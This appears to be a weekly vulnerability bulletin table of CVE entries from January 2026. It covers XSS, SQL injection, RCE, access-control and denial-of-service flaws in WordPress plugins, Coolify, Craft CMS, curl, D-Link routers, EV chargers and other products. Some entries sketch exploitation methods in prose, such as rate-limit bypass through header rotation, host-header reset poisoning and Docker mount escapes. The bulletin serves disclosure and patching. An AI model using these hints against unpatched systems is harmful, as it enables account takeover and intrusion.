| chlodigital--PRIMER by chlodigital | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in chloédigital PRIMER by chloédigital primer-by-chloedigital allows Reflected XSS. This issue affects PRIMER by chloédigital: from n/a through <= 1.0.25. | 2026-01-08 | not yet calculated | CVE-2025-68873 | https://vdp.patchstack.com/database/Wordpress/Plugin/primer-by-chloedigital/vulnerability/wordpress-primer-by-chloedigital-plugin-1-0-25-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Cloudways--Breeze | Missing Authorization vulnerability in Cloudways Breeze breeze allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Breeze: from n/a through <= 2.2.21. | 2026-01-06 | not yet calculated | CVE-2025-69364 | https://vdp.patchstack.com/database/Wordpress/Plugin/breeze/vulnerability/wordpress-breeze-plugin-2-2-21-broken-access-control-vulnerability?_s_id=cve |
| CMSJunkie - WordPress Business Directory Plugins--WP-BusinessDirectory | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in CMSJunkie - WordPress Business Directory Plugins WP-BusinessDirectory wp-businessdirectory allows Reflected XSS. This issue affects WP-BusinessDirectory: from n/a through <= 3.1.5. | 2026-01-08 | not yet calculated | CVE-2025-68887 | https://vdp.patchstack.com/database/Wordpress/Plugin/wp-businessdirectory/vulnerability/wordpress-wp-businessdirectory-plugin-3-1-3-cross-site-scripting-xss-vulnerability?_s_id=cve |
| CodexThemes--TheGem Theme Elements (for Elementor) | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in CodexThemes TheGem Theme Elements (for Elementor) thegem-elements-elementor allows PHP Local File Inclusion. This issue affects TheGem Theme Elements (for Elementor): from n/a through <= 5.11.0. | 2026-01-06 | not yet calculated | CVE-2025-69356 | https://vdp.patchstack.com/database/Wordpress/Plugin/thegem-elements-elementor/vulnerability/wordpress-thegem-theme-elements-for-elementor-plugin-5-11-0-local-file-inclusion-vulnerability?_s_id=cve |
| CodexThemes--TheGem Theme Elements (for Elementor) | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in CodexThemes TheGem Theme Elements (for Elementor) thegem-elements-elementor allows Stored XSS. This issue affects TheGem Theme Elements (for Elementor): from n/a through <= 5.11.0. | 2026-01-06 | not yet calculated | CVE-2025-69357 | https://vdp.patchstack.com/database/Wordpress/Plugin/thegem-elements-elementor/vulnerability/wordpress-thegem-theme-elements-for-elementor-plugin-5-11-0-cross-site-scripting-xss-vulnerability?_s_id=cve |
| CodexThemes--TheGem Theme Elements (for WPBakery) | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in CodexThemes TheGem Theme Elements (for WPBakery) thegem-elements allows DOM-Based XSS. This issue affects TheGem Theme Elements (for WPBakery): from n/a through <= 5.11.0. | 2026-01-06 | not yet calculated | CVE-2025-69360 | https://vdp.patchstack.com/database/Wordpress/Plugin/thegem-elements/vulnerability/wordpress-thegem-theme-elements-for-wpbakery-plugin-5-11-0-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Commvault--WebConsole | The Report Builder component of the application stores user input directly in a web page and displays it to other users, which raised concerns about a possible Cross-Site Scripting (XSS) attack. Proper management of this functionality helps ensure a secure and seamless user experience. Although the user input is not validated in the report creation, these scripts are not executed when the report is run by end users. The script is executed when the report is modified through the report builder by a user with edit permissions. The Report Builder is part of the WebConsole. The WebConsole package is currently end of life, and is no longer maintained. We strongly recommend against installing or using it in any production environment. However, if you choose to install it, for example, to access functionality like the Report Builder, it must be deployed within a fully isolated network that has no access to sensitive data or internet connectivity. This is a critical security precaution, as the retired package may contain unpatched vulnerabilities and is no longer supported with updates or fixes. | 2026-01-07 | not yet calculated | CVE-2025-12776 | https://documentation.commvault.com/securityadvisories/CV_2025_06_3.html |
| contentstudio--Contentstudio | Unrestricted Upload of File with Dangerous Type vulnerability in contentstudio Contentstudio contentstudio allows Upload a Web Shell to a Web Server. This issue affects Contentstudio: from n/a through <= 1.3.7. | 2026-01-08 | not yet calculated | CVE-2025-67910 | https://vdp.patchstack.com/database/Wordpress/Plugin/contentstudio/vulnerability/wordpress-contentstudio-plugin-1-3-7-arbitrary-file-upload-vulnerability?_s_id=cve |
| CoolHappy--The Events Calendar Countdown Addon | Missing Authorization vulnerability in CoolHappy The Events Calendar Countdown Addon countdown-for-the-events-calendar allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects The Events Calendar Countdown Addon: from n/a through <= 1.4.15. | 2026-01-06 | not yet calculated | CVE-2025-69348 | https://vdp.patchstack.com/database/Wordpress/Plugin/countdown-for-the-events-calendar/vulnerability/wordpress-the-events-calendar-countdown-addon-plugin-1-4-15-broken-access-control-vulnerability?_s_id=cve |
| coollabsio--coolify | Coolify is an open-source and self-hostable tool for managing servers, applications, and databases. Prior to version 4.0.0-beta.420.7, a Remote Code Execution (RCE) vulnerability exists in Coolify's application deployment workflow. This flaw allows a low-privileged member to inject arbitrary Docker Compose directives during project creation or updates. By defining a malicious service that mounts the host filesystem, an attacker can achieve root-level command execution on the host OS, completely bypassing container isolation. Version 4.0.0-beta.420.7 contains a patch for the issue. | 2026-01-05 | not yet calculated | CVE-2025-59156 | https://github.com/coollabsio/coolify/security/advisories/GHSA-h5xw-7xvp-xrxr |
| coollabsio--coolify | Coolify is an open-source and self-hostable tool for managing servers, applications, and databases. Coolify versions prior to and including v4.0.0-beta.420.6 are vulnerable to a stored cross-site scripting (XSS) attack in the project creation workflow. An authenticated user with low privileges (e.g., member role) can create a project with a maliciously crafted name containing embedded JavaScript. When an administrator later attempts to delete the project or its associated resource, the payload automatically executes in the admin's browser context. Version 4.0.0-beta.420.7 contains a patch for the issue. | 2026-01-05 | not yet calculated | CVE-2025-59158 | https://github.com/coollabsio/coolify/security/advisories/GHSA-h52r-jxv9-9vhf |
| coollabsio--coolify | Coolify is an open-source and self-hostable tool for managing servers, applications, and databases. Coolify versions prior to and including v4.0.0-beta.420.8 have an information disclosure vulnerability in the `/api/v1/teams/{team_id}/members` and `/api/v1/teams/current/members` API endpoints that allows authenticated team members to access a highly sensitive `email_change_code` belonging to other users on the same team. This code is intended for a single-use email change verification and should be kept secret. Its exposure could enable a malicious actor to perform an unauthorized email address change on behalf of the victim. As of time of publication, no known patched versions exist. | 2026-01-05 | not yet calculated | CVE-2025-59955 | https://github.com/coollabsio/coolify/security/advisories/GHSA-927g-56xp-6427 |
| coollabsio--coolify | Coolify is an open-source and self-hostable tool for managing servers, applications, and databases. In Coolify versions up to and including v4.0.0-beta.434, a low privileged user (member) can invite a high privileged user. At first, the application will throw an error, but if the attacker clicks the invite button a second time, it actually works. This way, a low privileged user can invite themselves as an administrator to the Coolify instance. After the high privileged user is invited, the attacker can initiate a password reset and log in with the new admin. As of time of publication, it is unclear if a patch is available. | 2026-01-05 | not yet calculated | CVE-2025-64421 | https://github.com/coollabsio/coolify/security/advisories/GHSA-4p6r-m39m-9cm9 https://drive.google.com/file/d/1YZHFgiZv_k9p9909A63DAErsTsh8K1rc/view?usp=drive_link |
| coollabsio--coolify | Coolify is an open-source and self-hostable tool for managing servers, applications, and databases. In Coolify starting with version 4.0.0-beta.434, the /login endpoint advertises a rate limit of 5 requests but can be trivially bypassed by rotating the X-Forwarded-For header. This enables unlimited credential stuffing and brute-force attempts against user and admin accounts. As of time of publication, it is unclear if a patch is available. | 2026-01-05 | not yet calculated | CVE-2025-64422 | https://github.com/coollabsio/coolify/security/advisories/GHSA-688j-rm43-5r8x |
| coollabsio--coolify | Coolify is an open-source and self-hostable tool for managing servers, applications, and databases. In Coolify versions up to and including v4.0.0-beta.434, a low privileged user (member) can see and use invitation links sent to an administrator. When they use the link before the legitimate recipient does, they are able to log in as an administrator, meaning they have successfully escalated their privileges. As of time of publication, it is unclear if a patch is available. | 2026-01-05 | not yet calculated | CVE-2025-64423 | https://github.com/coollabsio/coolify/security/advisories/GHSA-4fqm-797g-7m6j |
| coollabsio--coolify | Coolify is an open-source and self-hostable tool for managing servers, applications, and databases. In Coolify versions up to and including v4.0.0-beta.434, a command injection vulnerability exists in the git source input fields of a resource, allowing a low privileged user (member) to execute system commands as root on the Coolify instance. As of time of publication, it is unclear if a patch is available. | 2026-01-05 | not yet calculated | CVE-2025-64424 | https://github.com/coollabsio/coolify/security/advisories/GHSA-qx24-jhwj-8w6x https://drive.google.com/file/d/1rk7AYxNDkJUwo8uWbzX62PpBxpDYeyrZ/view?usp=drive_link |
| coollabsio--coolify | Coolify is an open-source and self-hostable tool for managing servers, applications, and databases. In Coolify versions up to and including v4.0.0-beta.434, an attacker can initiate a password reset for a victim, and modify the host header of the request to a malicious value. The victim will receive a password reset email, with a link to the malicious host. If the victim clicks this link, their reset token is sent to the attacker's server, allowing the attacker to use it to change the victim's password and takeover their account. As of time of publication, it is unclear if a patch is available. | 2026-01-05 | not yet calculated | CVE-2025-64425 | https://github.com/coollabsio/coolify/security/advisories/GHSA-f737-2p93-g2cw https://drive.google.com/file/d/1I5sJHcpetJbKlwVS2usAD7qmgH37Y4rw/view?usp=drive_link |
| coredns--coredns | CoreDNS is a DNS server that chains plugins. Prior to version 1.14.0, multiple CoreDNS server implementations (gRPC, HTTPS, and HTTP/3) lack critical resource-limiting controls. An unauthenticated remote attacker can exhaust memory and degrade or crash the server by opening many concurrent connections, streams, or sending oversized request bodies. The issue is similar in nature to CVE-2025-47950 (QUIC DoS) but affects additional server types that do not enforce connection limits, stream limits, or message size constraints. Version 1.14.0 contains a patch. | 2026-01-08 | not yet calculated | CVE-2025-68151 | https://github.com/coredns/coredns/security/advisories/GHSA-527x-5wrf-22m2 https://github.com/coredns/coredns/pull/7490 https://github.com/coredns/coredns/commit/0d8cbb1a6bcb6bc9c1a489865278b8725fa20812 |
| craftcms--cms | Craft is a platform for creating digital experiences. In versions 5.0.0-RC1 through 5.8.20 and 4.0.0-RC1 through 4.16.16, authenticated users on a Craft installation could potentially expose sensitive assets via their user profile photo via maliciously crafted requests. Users should update to the patched versions (5.8.21 and 4.16.17) to mitigate the issue. | 2026-01-05 | not yet calculated | CVE-2025-68436 | https://github.com/craftcms/cms/security/advisories/GHSA-53vf-c43h-j2x9 https://github.com/craftcms/cms/commit/4bcb0db554e273b66ce3b75263a13414c2368fc9 |
| craftcms--cms | Craft is a platform for creating digital experiences. In versions 5.0.0-RC1 through 5.8.20 and 4.0.0-RC1 through 4.16.16, the Craft CMS GraphQL `save_<VolumeName>_Asset` mutation is vulnerable to Server-Side Request Forgery (SSRF). This vulnerability arises because the `_file` input, specifically its `url` parameter, allows the server to fetch content from arbitrary remote locations without proper validation. Attackers can exploit this by providing internal IP addresses or cloud metadata endpoints as the `url`, forcing the server to make requests to these restricted services. The fetched content is then saved as an asset, which can subsequently be accessed and exfiltrated, leading to potential data exposure and infrastructure compromise. This exploitation requires specific GraphQL permissions for asset management within the targeted volume. Users should update to the patched 5.8.21 and 4.16.17 releases to mitigate the issue. | 2026-01-05 | not yet calculated | CVE-2025-68437 | https://github.com/craftcms/cms/security/advisories/GHSA-x27p-wfqw-hfcc https://github.com/craftcms/cms/commit/013db636fdb38f3ce5657fd196b6d952f98ebc52 https://github.com/craftcms/cms/blob/5.x/CHANGELOG.md#5821---2025-12-04 |
| craftcms--cms | Craft is a platform for creating digital experiences. Versions 5.0.0-RC1 through 5.8.20 and 4.0.0-RC1 through 4.16.16 are vulnerable to potential authenticated Remote Code Execution via Twig SSTI. For this to work, users must have administrator access to the Craft Control Panel, and allowAdminChanges must be enabled, which is against Craft CMS' recommendations for any non-dev environment. Alternatively, a non-administrator account with allowAdminChanges disabled can be used, provided access to the System Messages utility is available. It is possible to craft a malicious payload using the Twig `map` filter in text fields that accept Twig input under Settings in the Craft control panel or using the System Messages utility, which could lead to a RCE. Users should update to the patched versions (5.8.21 and 4.16.17) to mitigate the issue. | 2026-01-05 | not yet calculated | CVE-2025-68454 | https://github.com/craftcms/cms/security/advisories/GHSA-742x-x762-7383 https://github.com/craftcms/cms/commit/d82680f4a05f9576883bb83c3f6243d33ca73ebe https://github.com/craftcms/cms/blob/5.x/CHANGELOG.md#5821---2025-12-04 |
| craftcms--cms | Craft is a platform for creating digital experiences. Versions 5.0.0-RC1 through 5.8.20 and 4.0.0-RC1 through 4.16.16 are vulnerable to potential authenticated Remote Code Execution via malicious attached Behavior. Note that attackers must have administrator access to the Craft Control Panel for this to work. Users should update to the patched versions (5.8.21 and 4.16.17) to mitigate the issue. | 2026-01-05 | not yet calculated | CVE-2025-68455 | https://github.com/craftcms/cms/security/advisories/GHSA-255j-qw47-wjh5 https://github.com/craftcms/cms/commit/27f55886098b56c00ddc53b69239c9c9192252c7 https://github.com/craftcms/cms/commit/6e608a1a5bfb36943f94f584b7548ca542a86fef https://github.com/craftcms/cms/commit/ec43c497edde0b2bf2e39a119cded2e55f9fe593 https://github.com/craftcms/cms/blob/5.x/CHANGELOG.md#5821---2025-12-04 |
| craftcms--cms | Craft is a platform for creating digital experiences. In versions 5.0.0-RC1 through 5.8.20 and 3.0.0 through 4.16.16, unauthenticated users can trigger database backup operations via specific admin actions, potentially leading to resource exhaustion or information disclosure. Users should update to the patched versions (5.8.21 and 4.16.17) to mitigate the issue. Craft 3 users should update to the latest Craft 4 and 5 releases, which include the fixes. | 2026-01-05 | not yet calculated | CVE-2025-68456 | https://github.com/craftcms/cms/security/advisories/GHSA-v64r-7wg9-23pr https://github.com/craftcms/cms/commit/f83d4e0c6b906743206b4747db4abf8164b8da39 https://github.com/craftcms/cms/blob/5.x/CHANGELOG.md#5821---2025-12-04 |
| curl--curl | When using the `CURLOPT_PINNEDPUBLICKEY` option with libcurl or `--pinnedpubkey` with the curl tool, curl should check the public key of the server certificate to verify the peer. This check was skipped in a certain condition that would then make curl allow the connection without performing the proper check, thus not noticing a possible impostor. To skip this check, the connection had to be done with QUIC with ngtcp2 built to use GnuTLS and the user had to explicitly disable the standard certificate verification. | 2026-01-08 | not yet calculated | CVE-2025-13034 | json www |
| curl--curl | When doing multi-threaded LDAPS transfers (LDAP over TLS) with libcurl, changing TLS options in one thread would inadvertently change them globally and therefore possibly also affect other concurrently setup transfers. Disabling certificate verification for a specific transfer could unintentionally disable the feature for other threads as well. | 2026-01-08 | not yet calculated | CVE-2025-14017 | json www |
| curl--curl | When an OAuth2 bearer token is used for an HTTP(S) transfer, and that transfer performs a cross-protocol redirect to a second URL that uses an IMAP, LDAP, POP3 or SMTP scheme, curl might wrongly pass on the bearer token to the new target host. | 2026-01-08 | not yet calculated | CVE-2025-14524 | json www issue |
| curl--curl | When doing TLS related transfers with reused easy or multi handles and altering the `CURLSSLOPT_NO_PARTIALCHAIN` option, libcurl could accidentally reuse a CA store cached in memory for which the partial chain option was reversed, contrary to the user's wishes and expectations. This could make libcurl find and accept a trust chain that it otherwise would not. | 2026-01-08 | not yet calculated | CVE-2025-14819 | json www |
| curl--curl | When doing SSH-based transfers using either SCP or SFTP, and setting the known_hosts file, libcurl could still mistakenly accept connecting to hosts *not present* in the specified file if they were added as recognized in the libssh *global* known_hosts file. | 2026-01-08 | not yet calculated | CVE-2025-15079 | json www issue |
| curl--curl | When doing SSH-based transfers using either SCP or SFTP, and asked to do public key authentication, curl would wrongly still ask and authenticate using a locally running SSH agent. | 2026-01-08 | not yet calculated | CVE-2025-15224 | json www issue |
| CyberChimps--Responsive Addons for Elementor | Missing Authorization vulnerability in CyberChimps Responsive Addons for Elementor responsive-addons-for-elementor allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Responsive Addons for Elementor: from n/a through <= 2.0.8. | 2026-01-06 | not yet calculated | CVE-2025-69363 | https://vdp.patchstack.com/database/Wordpress/Plugin/responsive-addons-for-elementor/vulnerability/wordpress-responsive-addons-for-elementor-plugin-2-0-8-broken-access-control-vulnerability?_s_id=cve |
| D-Link--DSL-2640B | Multiple D-Link DSL/DIR/DNS devices contain an authentication bypass and improper access control vulnerability in the dnscfg.cgi endpoint that allows an unauthenticated attacker to access DNS configuration functionality. By directly requesting this endpoint, an attacker can modify the device's DNS settings without valid credentials, enabling DNS hijacking ("DNSChanger") attacks that redirect user traffic to attacker-controlled infrastructure. In 2019, D-Link reported that this behavior was leveraged by the "GhostDNS" malware ecosystem targeting consumer and carrier routers. All impacted products were subsequently designated end-of-life/end-of-service, and no longer receive security updates. Exploitation evidence was observed by the Shadowserver Foundation on 2025-11-27 (UTC). | 2026-01-05 | not yet calculated | CVE-2026-0625 | https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10488 https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10068 https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10118 https://www.vulncheck.com/advisories/dlink-dsl-command-injection-via-dns-configuration-endpoint |
| Data Illusion Zumbrunn--NGSurvey | Stored cross-site scripting (XSS, CWE-79) in the survey content and administration functionality in Data Illusion Zumbrunn NGSurvey Enterprise Edition 3.6.4 on all supported platforms (on Windows and Linux servers) allows authenticated remote users with survey creation or edit privileges to execute arbitrary JavaScript in other users' browsers, steal session information and perform unauthorized actions on their behalf via crafted survey content that is rendered without proper output encoding. | 2026-01-07 | not yet calculated | CVE-2025-15479 | https://docs.ngsurvey.com/installation-setup/change-log#id-3.6.17-2025-05-28 https://cds.thalesgroup.com/en/tcs-cert/CVE-2025-15479 |
| Devolutions--PowerShell Universal | Cross-site Scripting vulnerability in Devolutions PowerShell Universal. This issue affects PowerShell Universal: before 4.5.6, before 5.6.13. | 2026-01-07 | not yet calculated | CVE-2026-0618 | https://devolutions.net/security/advisories/DEVO-2026-0001/ |
| Devolutions--Remote Desktop Manager | Exposure of sensitive information in the TeamViewer entry dashboard component in Devolutions Remote Desktop Manager 2025.3.24.0 through 2025.3.28.0 on Windows allows an external observer to view a password on screen via a defective masking feature, for example during physical observation or screen sharing. | 2026-01-08 | not yet calculated | CVE-2026-0747 | https://devolutions.net/security/advisories/DEVO-2026-0002/ |
| e-plugins--ListingHub | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in e-plugins ListingHub listinghub allows Reflected XSS. This issue affects ListingHub: from n/a through 1.2.6. | 2026-01-08 | not yet calculated | CVE-2025-12551 | https://vdp.patchstack.com/database/Wordpress/Plugin/listinghub/vulnerability/wordpress-listinghub-plugin-1-2-6-cross-site-scripting-xss-vulnerability?_s_id=cve |
| e-plugins--Real Estate Pro | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in e-plugins Real Estate Pro real-estate-pro allows Reflected XSS. This issue affects Real Estate Pro: from n/a through <= 2.1.4. | 2026-01-08 | not yet calculated | CVE-2025-13504 | https://vdp.patchstack.com/database/Wordpress/Plugin/real-estate-pro/vulnerability/wordpress-real-estate-pro-plugin-2-1-4-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| EFACEC--QC 60/90/120 | An attacker with the ability to interact through the network and with access credentials could, thanks to the unsecured (unencrypted) MQTT communications protocol, write to the server topics of the board that controls the MQTT communications. | 2026-01-07 | not yet calculated | CVE-2026-22535 | https://cds.thalesgroup.com/en |
| EFACEC--QC 60/90/120 | The absence of permissions control for the user XXX allows the current configuration in the sudoers file to escalate privileges without any restrictions. | 2026-01-07 | not yet calculated | CVE-2026-22536 | https://cds.thalesgroup.com/en |
| EFACEC--QC 60/90/120 | The lack of hardening of the system allows the user used to manage and maintain the charger to consult different files containing clear-text credentials or valuable information for an attacker. | 2026-01-07 | not yet calculated | CVE-2026-22537 | https://cds.thalesgroup.com/en |
| EFACEC--QC 60/90/120 | As the service interaction is performed without authentication, an attacker with some knowledge of the protocol could obtain information about the charger via OCPP v1.6. | 2026-01-07 | not yet calculated | CVE-2026-22539 | https://cds.thalesgroup.com/en |
| EFACEC--QC 60/90/120 | The massive sending of ICMP requests causes a denial of service on one of the boards of the EV charger that controls the EV interfaces; since that board must be operating correctly for the charger to function correctly, the charger is affected as well. | 2026-01-07 | not yet calculated | CVE-2026-22541 | https://cds.thalesgroup.com/en |
| EFACEC--QC 60/90/120 | An attacker with access to the system's internal network can cause a denial of service on the system by making two concurrent connections through the Telnet service. | 2026-01-07 | not yet calculated | CVE-2026-22542 | https://cds.thalesgroup.com/en |
| EFACEC--QC 60/90/120 | The credentials required to access the device's web server are sent in base64 within the HTTP headers. Since base64 is an encoding, not encryption, an attacker could intercept the web request handling the login and obtain the credentials. | 2026-01-07 | not yet calculated | CVE-2026-22543 | https://cds.thalesgroup.com/en |
| EFACEC--QC 60/90/120 | An attacker with a network connection could detect credentials in clear text. | 2026-01-07 | not yet calculated | CVE-2026-22544 | https://cds.thalesgroup.com/en |
| EFACEC--QC60/90/120 | The massive sending of ARP requests causes a denial of service on one board of the charger that controls the EV interfaces; since that board must be operating correctly for the charger to function correctly, the charger is affected as well. | 2026-01-07 | not yet calculated | CVE-2026-22540 | https://cds.thalesgroup.com/en |
| Elated-Themes--Neo Ocular | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Elated-Themes Neo Ocular neoocular allows PHP Local File Inclusion. This issue affects Neo Ocular: from n/a through < 1.2. | 2026-01-08 | not yet calculated | CVE-2025-67920 | https://vdp.patchstack.com/database/Wordpress/Theme/neoocular/vulnerability/wordpress-neo-ocular-theme-1-2-local-file-inclusion-vulnerability?_s_id=cve |
| Fahad Mahmood--RSS Feed Widget | Missing Authorization vulnerability in Fahad Mahmood RSS Feed Widget rss-feed-widget allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects RSS Feed Widget: from n/a through <= 3.0.2. | 2026-01-06 | not yet calculated | CVE-2025-69349 | https://vdp.patchstack.com/database/Wordpress/Plugin/rss-feed-widget/vulnerability/wordpress-rss-feed-widget-plugin-3-0-2-broken-access-control-vulnerability?_s_id=cve |
| Forcepoint--Forcepoint One Endpoint (F1E) | Forcepoint One DLP Client, version 23.04.5642 (and possibly newer versions), includes a restricted version of Python 2.5.4 that prevents use of the ctypes library. ctypes is a foreign function interface (FFI) for Python, enabling calls to DLLs/shared libraries, memory allocation, and direct code execution. It was demonstrated that these restrictions could be bypassed. | 2026-01-06 | not yet calculated | CVE-2025-14026 | https://support.forcepoint.com/s/article/000042256 https://kb.cert.org/vuls/id/420440 |
| Fujitsu Client Computing Limited--Fujitsu Security Solution AuthConductor Client Basic V2 | Origin validation error issue exists in Fujitsu Security Solution AuthConductor Client Basic V2 2.0.25.0 and earlier. If this vulnerability is exploited, an attacker who can log in to the Windows system where the affected product is installed may execute arbitrary code with SYSTEM privilege and/or modify the registry value. | 2026-01-07 | not yet calculated | CVE-2026-20893 | https://www.fmworld.net/biz/common/info/202601acc/ https://jvn.jp/en/jp/JVN24626628/ |
| G5Theme--Zorka | Missing Authorization vulnerability in G5Theme Zorka zorka allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Zorka: from n/a through <= 1.5.7. | 2026-01-08 | not yet calculated | CVE-2026-0676 | https://vdp.patchstack.com/database/Wordpress/Theme/zorka/vulnerability/wordpress-zorka-theme-1-5-7-broken-access-control-vulnerability?_s_id=cve |
| GestSup--GestSup | GestSup versions up to and including 3.2.56 contain a cross-site request forgery (CSRF) vulnerability where the application does not verify the authenticity of client requests. An attacker can induce a logged-in user to submit crafted requests that perform actions with the victim's privileges. This can be exploited to create privileged accounts by targeting the administrative user creation endpoint. | 2026-01-09 | not yet calculated | CVE-2026-22194 | https://gestsup.fr/index.php?page=changelog https://www.vulncheck.com/advisories/gestsup-csrf-allows-privileged-actions |
| GestSup--GestSup | GestSup versions up to and including 3.2.56 contain a SQL injection vulnerability in the search bar functionality. User-controlled search input is incorporated into SQL queries without sufficient neutralization, allowing an authenticated attacker to manipulate database queries. Successful exploitation can result in unauthorized access to or modification of database contents depending on database privileges. | 2026-01-09 | not yet calculated | CVE-2026-22195 | https://gestsup.fr/index.php?page=changelog https://www.vulncheck.com/advisories/gestsup-sqli-in-search-bar |
| GestSup--GestSup | GestSup versions up to and including 3.2.56 contain a SQL injection vulnerability in ticket creation functionality. User-controlled input provided during ticket creation is incorporated into SQL queries without sufficient neutralization, allowing an authenticated attacker to manipulate database queries. Successful exploitation can result in unauthorized access to or modification of database contents depending on database privileges. | 2026-01-09 | not yet calculated | CVE-2026-22196 | https://gestsup.fr/index.php?page=changelog https://www.vulncheck.com/advisories/gestsup-sqli-in-ticket-creation |
| GestSup--GestSup | GestSup versions up to and including 3.2.56 contain multiple SQL injection vulnerabilities in the asset list functionality. Multiple request parameters used to filter, search, or sort assets are incorporated into SQL queries without sufficient neutralization, allowing an authenticated attacker to manipulate database queries. Successful exploitation can result in unauthorized access to or modification of database contents depending on database privileges. | 2026-01-09 | not yet calculated | CVE-2026-22197 | https://gestsup.fr/index.php?page=changelog https://www.vulncheck.com/advisories/gestsup-multiple-sqli-in-asset-list |
| GestSup--GestSup | GestSup versions up to and including 3.2.56 contain a pre-authentication stored cross-site scripting (XSS) vulnerability in the API error logging functionality. By sending an API request with a crafted X-API-KEY header value (for example, to /api/v1/ticket.php), an unauthenticated attacker can cause attacker-controlled HTML/JavaScript to be written to log entries. When an administrator later views the affected logs in the web interface, the injected content is rendered without proper output encoding, resulting in arbitrary script execution in the administrator's browser session. | 2026-01-09 | not yet calculated | CVE-2026-22198 | https://gestsup.fr/index.php?page=changelog https://www.vulncheck.com/advisories/gestsup-stored-xss-in-api-error-logs |
| getkirby--kirby | Kirby is an open-source content management system. From versions 5.0.0 to 5.2.1, Kirby is missing permission checks in the content changes API. This vulnerability affects all Kirby sites where user permissions are configured to prevent specific role(s) from performing write actions, specifically by disabling the update permission with the intent to prevent modifications to site content. This vulnerability does not affect sites that have not deviated from the default user permissions. This issue has been patched in version 5.2.2. | 2026-01-08 | not yet calculated | CVE-2026-21896 | https://github.com/getkirby/kirby/security/advisories/GHSA-4j78-4xrm-cr2f https://github.com/getkirby/kirby/commit/f5ce1347b427b819bf193acf11fd0da232f7af47 https://github.com/getkirby/kirby/releases/tag/5.2.2 |
| GitHub--Enterprise Server | An Improper Neutralization of Input During Web Page Generation vulnerability was identified in GitHub Enterprise Server that allowed attacker controlled HTML to be rendered by the Filter component (search) across GitHub that could be used to exfiltrate sensitive information. An attacker would require permissions to create or modify the names of milestones, issues, pull requests, or similar entities that are rendered in the vulnerable filter/search components. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.20 and was fixed in versions 3.19.1, 3.18.2, 3.17.8, 3.16.11, 3.15.15, and 3.14.20. This vulnerability was reported via the GitHub Bug Bounty program. | 2026-01-06 | not yet calculated | CVE-2025-13744 | https://docs.github.com/en/enterprise-server@3.14/admin/release-notes#3.14.20 https://docs.github.com/en/enterprise-server@3.15/admin/release-notes#3.15.15 https://docs.github.com/en/enterprise-server@3.16/admin/release-notes#3.16.11 https://docs.github.com/en/enterprise-server@3.17/admin/release-notes#3.17.8 https://docs.github.com/en/enterprise-server@3.18/admin/release-notes#3.18.2 https://docs.github.com/en/enterprise-server@3.19/admin/release-notes#3.19.1 |
| GnuTLS--libtasn1 | Stack-based buffer overflow in libtasn1 version v4.20.0. The function fails to validate the size of input data, resulting in a buffer overflow in asn1_expend_octet_string. | 2026-01-07 | not yet calculated | CVE-2025-13151 | Source Code Repository Proposed Pull Request |
| Google--Chrome | Insufficient policy enforcement in WebView tag in Google Chrome prior to 143.0.7499.192 allowed an attacker who convinced a user to install a malicious extension to inject scripts or HTML into a privileged page via a crafted Chrome Extension. (Chromium security severity: High) | 2026-01-06 | not yet calculated | CVE-2026-0628 | |
| gopiplus@hotmail.com--Scroll rss excerpt | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in gopiplus@hotmail.com Scroll rss excerpt scroll-rss-excerpt allows Reflected XSS. This issue affects Scroll rss excerpt: from n/a through <= 5.0. | 2026-01-08 | not yet calculated | CVE-2025-68892 | https://vdp.patchstack.com/database/Wordpress/Plugin/scroll-rss-excerpt/vulnerability/wordpress-scroll-rss-excerpt-plugin-5-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| gunet--openeclass | The Open eClass platform (formerly known as GUnet eClass) is a complete course management system. Prior to version 4.2, an arbitrary file upload vulnerability in the theme import functionality enables an attacker with administrative privileges to upload arbitrary files on the server's file system. The main cause of the issue is that there is no validation or sanitization of the files present inside the zip archive. This leads to remote code execution on the web server. Version 4.2 patches the issue. | 2026-01-08 | not yet calculated | CVE-2026-22241 | https://github.com/gunet/openeclass/security/advisories/GHSA-rf6j-xgqp-wjxg https://github.com/gunet/openeclass/commit/3f9d267b79812a4dd708bb1302339e6a5abe67d9 |
| hands01--e-shops | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in hands01 e-shops e-shops-cart2 allows DOM-Based XSS. This issue affects e-shops: from n/a through <= 1.0.4. | 2026-01-08 | not yet calculated | CVE-2025-68890 | https://vdp.patchstack.com/database/Wordpress/Plugin/e-shops-cart2/vulnerability/wordpress-e-shops-plugin-1-0-4-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| https://github.com/FoobarOy/--Foomuuri | An Improper Authorization vulnerability in Foomuuri allows arbitrary users to influence the firewall configuration. This issue affects Foomuuri: from ? before 0.31. | 2026-01-08 | not yet calculated | CVE-2025-67603 | https://bugzilla.suse.com/show_bug.cgi?id=CVE-2025-67603 https://security.opensuse.org/2026/01/07/foomuuri-lack-of-dbus-authorization.html |
| https://github.com/FoobarOy/--Foomuuri | An Improper Neutralization of Argument Delimiters vulnerability in Foomuuri can lead to integrity loss of the firewall configuration or further unspecified impact by manipulating the JSON configuration passed to `nft`. This issue affects Foomuuri: from ? before 0.31. | 2026-01-08 | not yet calculated | CVE-2025-67858 | https://bugzilla.suse.com/show_bug.cgi?id=CVE-2025-67858 https://security.opensuse.org/2026/01/07/foomuuri-lack-of-dbus-authorization.html |
